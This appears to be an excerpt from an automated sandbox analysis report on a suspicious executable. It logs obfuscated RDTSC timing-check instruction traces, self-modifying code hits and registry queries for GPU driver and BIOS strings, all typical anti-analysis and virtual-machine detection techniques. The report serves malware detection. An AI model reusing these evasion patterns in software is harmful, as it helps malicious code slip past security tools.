            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503AF second address: 4C503E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e pushad 0x0000000f mov ecx, 57176E0Dh 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 xor eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F466483F650h 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503E1 second address: 4C5043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov cl, A2h 0x0000000d call 00007F4664873C11h 0x00000012 pushfd 0x00000013 jmp 00007F4664873C10h 0x00000018 or ecx, 2D52B8E8h 0x0000001e jmp 00007F4664873C0Bh 0x00000023 popfd 0x00000024 pop eax 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4664873C10h 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5043F second address: 4C50445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50445 second address: 4C504BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4664873C0Bh 0x00000013 and cx, 0D8Eh 0x00000018 jmp 00007F4664873C19h 0x0000001d popfd 0x0000001e popad 0x0000001f lea eax, dword ptr [ebp-10h] 0x00000022 jmp 00007F4664873C0Dh 0x00000027 mov dword ptr fs:[00000000h], eax 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F4664873C0Ch 0x00000034 sbb al, 00000038h 0x00000037 jmp 00007F4664873C0Bh 0x0000003c popfd 0x0000003d mov ch, ADh 0x0000003f popad 0x00000040 mov dword ptr [ebp-18h], esp 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C504BD second address: 4C504D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F658h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C504D9 second address: 4C504DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C504DF second address: 4C504E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C504E3 second address: 4C505A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000018h] 0x0000000e jmp 00007F4664873C19h 0x00000013 mov ecx, dword ptr [eax+00000FDCh] 0x00000019 pushad 0x0000001a push eax 0x0000001b pushfd 0x0000001c jmp 00007F4664873C13h 0x00000021 sbb eax, 18A0C06Eh 0x00000027 jmp 00007F4664873C19h 0x0000002c popfd 0x0000002d pop esi 0x0000002e call 00007F4664873C11h 0x00000033 movzx esi, di 0x00000036 pop ebx 0x00000037 popad 0x00000038 test ecx, ecx 0x0000003a jmp 00007F4664873C18h 0x0000003f jns 00007F4664873C42h 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F4664873C0Eh 0x0000004c xor si, A978h 0x00000051 jmp 00007F4664873C0Bh 0x00000056 popfd 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401B2 second address: 4C401E3 instructions: 0x00000000 rdtsc 0x00000002 call 00007F466483F64Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F466483F659h 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401E3 second address: 4C401E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401E7 second address: 4C401ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401ED second address: 4C401F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401F3 second address: 4C401F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401F7 second address: 4C402C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4664873C13h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx ecx, bx 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov edi, eax 0x0000001c pushfd 0x0000001d jmp 00007F4664873C12h 0x00000022 or ah, FFFFFFB8h 0x00000025 jmp 00007F4664873C0Bh 0x0000002a popfd 0x0000002b popad 0x0000002c sub esp, 2Ch 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F4664873C14h 0x00000036 xor si, 4818h 0x0000003b jmp 00007F4664873C0Bh 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007F4664873C18h 0x00000047 or ecx, 32D4B278h 0x0000004d jmp 00007F4664873C0Bh 0x00000052 popfd 0x00000053 popad 0x00000054 xchg eax, ebx 0x00000055 jmp 00007F4664873C16h 0x0000005a push eax 0x0000005b jmp 00007F4664873C0Bh 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C402C4 second address: 4C402C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C402C8 second address: 4C402CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C402CE second address: 4C4031E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F466483F64Eh 0x00000011 jmp 00007F466483F655h 0x00000016 popfd 0x00000017 jmp 00007F466483F650h 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 mov di, ax 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40366 second address: 4C403BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F4664873C17h 0x00000010 sub edi, edi 0x00000012 jmp 00007F4664873C0Fh 0x00000017 inc ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F4664873C0Bh 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403BF second address: 4C403C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403C4 second address: 4C403DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4664873C12h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403DB second address: 4C40447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test al, al 0x00000009 jmp 00007F466483F64Eh 0x0000000e je 00007F466483F7E4h 0x00000014 pushad 0x00000015 push ecx 0x00000016 mov cl, bl 0x00000018 pop esi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F466483F655h 0x00000020 xor ecx, 6E4ECA26h 0x00000026 jmp 00007F466483F651h 0x0000002b popfd 0x0000002c jmp 00007F466483F650h 0x00000031 popad 0x00000032 popad 0x00000033 lea ecx, dword ptr [ebp-14h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40447 second address: 4C4044B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4044B second address: 4C40468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40526 second address: 4C4052C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4052C second address: 4C40548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F466483F698h 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40548 second address: 4C405B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov si, 976Fh 0x00000009 popad 0x0000000a cmp dword ptr [ebp-14h], edi 0x0000000d jmp 00007F4664873C12h 0x00000012 jne 00007F46D6CC1B3Ah 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4664873C0Eh 0x0000001f jmp 00007F4664873C15h 0x00000024 popfd 0x00000025 mov ch, 8Ch 0x00000027 popad 0x00000028 mov ebx, dword ptr [ebp+08h] 0x0000002b jmp 00007F4664873C13h 0x00000030 lea eax, dword ptr [ebp-2Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C405B5 second address: 4C405B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C405B9 second address: 4C405D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C405D4 second address: 4C40611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F466483F64Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F466483F64Eh 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C406BE second address: 4C406C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C406C4 second address: 4C406D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C406D4 second address: 4C406DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C406DA second address: 4C40047 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F466483F64Eh 0x00000012 and eax, 7BAAD9B8h 0x00000018 jmp 00007F466483F64Bh 0x0000001d popfd 0x0000001e popad 0x0000001f je 00007F46D6C8D58Ch 0x00000025 xor eax, eax 0x00000027 jmp 00007F4664818D7Ah 0x0000002c pop esi 0x0000002d pop edi 0x0000002e pop ebx 0x0000002f leave 0x00000030 retn 0004h 0x00000033 nop 0x00000034 sub esp, 04h 0x00000037 mov esi, eax 0x00000039 cmp esi, 00000000h 0x0000003c setne al 0x0000003f xor ebx, ebx 0x00000041 test al, 01h 0x00000043 jne 00007F466483F647h 0x00000045 jmp 00007F466483F74Fh 0x0000004a call 00007F466917B065h 0x0000004f mov edi, edi 0x00000051 pushad 0x00000052 call 00007F466483F655h 0x00000057 mov ah, 98h 0x00000059 pop edi 0x0000005a mov esi, 4A3CD789h 0x0000005f popad 0x00000060 xchg eax, ebp 0x00000061 jmp 00007F466483F654h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F466483F64Eh 0x0000006e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40047 second address: 4C4004D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4004D second address: 4C40051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40051 second address: 4C40092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f movzx ecx, dx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov edx, 655BD314h 0x0000001b popad 0x0000001c xchg eax, ecx 0x0000001d jmp 00007F4664873C16h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40092 second address: 4C40096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40096 second address: 4C40128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4664873C13h 0x0000000c add cl, 0000000Eh 0x0000000f jmp 00007F4664873C19h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 call 00007F4664873C0Ch 0x0000001d mov esi, 4B000D21h 0x00000022 pop ecx 0x00000023 pushfd 0x00000024 jmp 00007F4664873C17h 0x00000029 add esi, 6FB4B3CEh 0x0000002f jmp 00007F4664873C19h 0x00000034 popfd 0x00000035 popad 0x00000036 mov dword ptr [ebp-04h], 55534552h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40128 second address: 4C4012E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40150 second address: 4C40154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40154 second address: 4C4015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4015A second address: 4C40179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40179 second address: 4C4017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4017D second address: 4C40181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40181 second address: 4C40187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40B22 second address: 4C40B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40BA4 second address: 4C40BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2EDEA661h 0x00000010 jmp 00007F466483F656h 0x00000015 call 00007F46D6C845E8h 0x0000001a push 77082B70h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov eax, dword ptr [esp+10h] 0x0000002a mov dword ptr [esp+10h], ebp 0x0000002e lea ebp, dword ptr [esp+10h] 0x00000032 sub esp, eax 0x00000034 push ebx 0x00000035 push esi 0x00000036 push edi 0x00000037 mov eax, dword ptr [770E4538h] 0x0000003c xor dword ptr [ebp-04h], eax 0x0000003f xor eax, ebp 0x00000041 push eax 0x00000042 mov dword ptr [ebp-18h], esp 0x00000045 push dword ptr [ebp-08h] 0x00000048 mov eax, dword ptr [ebp-04h] 0x0000004b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000052 mov dword ptr [ebp-08h], eax 0x00000055 lea eax, dword ptr [ebp-10h] 0x00000058 mov dword ptr fs:[00000000h], eax 0x0000005e ret 0x0000005f jmp 00007F466483F650h 0x00000064 sub esi, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 push esi 0x0000006a pop ebx 0x0000006b movzx ecx, dx 0x0000006e popad 0x0000006f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40C26 second address: 4C40C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40C46 second address: 4C40C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40C4A second address: 4C40C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50A98 second address: 4C50A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50A9E second address: 4C50AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50AA2 second address: 4C50B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F466483F656h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F466483F651h 0x00000018 mov bh, cl 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F466483F653h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F466483F650h 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B0A second address: 4C50B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B0E second address: 4C50B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B14 second address: 4C50B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1CC21DE3h 0x00000008 pushfd 0x00000009 jmp 00007F4664873C18h 0x0000000e add ah, 00000028h 0x00000011 jmp 00007F4664873C0Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b jmp 00007F4664873C16h 0x00000020 push eax 0x00000021 jmp 00007F4664873C0Bh 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 mov bh, cl 0x0000002a movsx edx, cx 0x0000002d popad 0x0000002e mov esi, dword ptr [ebp+0Ch] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F4664873C0Fh 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B86 second address: 4C50B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B8C second address: 4C50B90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B90 second address: 4C50BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F466483F64Ah 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BA6 second address: 4C50BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BAC second address: 4C50BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BB0 second address: 4C50BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BB4 second address: 4C50BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46D6C6CE41h 0x0000000e pushad 0x0000000f mov ebx, 38C09EEAh 0x00000014 jmp 00007F466483F64Bh 0x00000019 popad 0x0000001a cmp dword ptr [770E459Ch], 05h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov dx, ax 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BE1 second address: 4C50C88 instructions: 0x00000000 rdtsc 0x00000002 call 00007F4664873C0Eh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, 7C3B5116h 0x0000000f popad 0x00000010 je 00007F46D6CB94A3h 0x00000016 pushad 0x00000017 push ebx 0x00000018 movzx ecx, dx 0x0000001b pop ebx 0x0000001c pushfd 0x0000001d jmp 00007F4664873C10h 0x00000022 jmp 00007F4664873C15h 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F4664873C0Ch 0x00000031 sub eax, 60736798h 0x00000037 jmp 00007F4664873C0Bh 0x0000003c popfd 0x0000003d mov dx, cx 0x00000040 popad 0x00000041 push eax 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F4664873C0Bh 0x00000049 add al, 0000005Eh 0x0000004c jmp 00007F4664873C19h 0x00000051 popfd 0x00000052 mov dx, cx 0x00000055 popad 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50C88 second address: 4C50C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50CB6 second address: 4C50CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50CBC second address: 4C50CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50DA2 second address: 4C50DA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 32CCF8 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4F8A58 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 32CC4C instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4E37F4 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
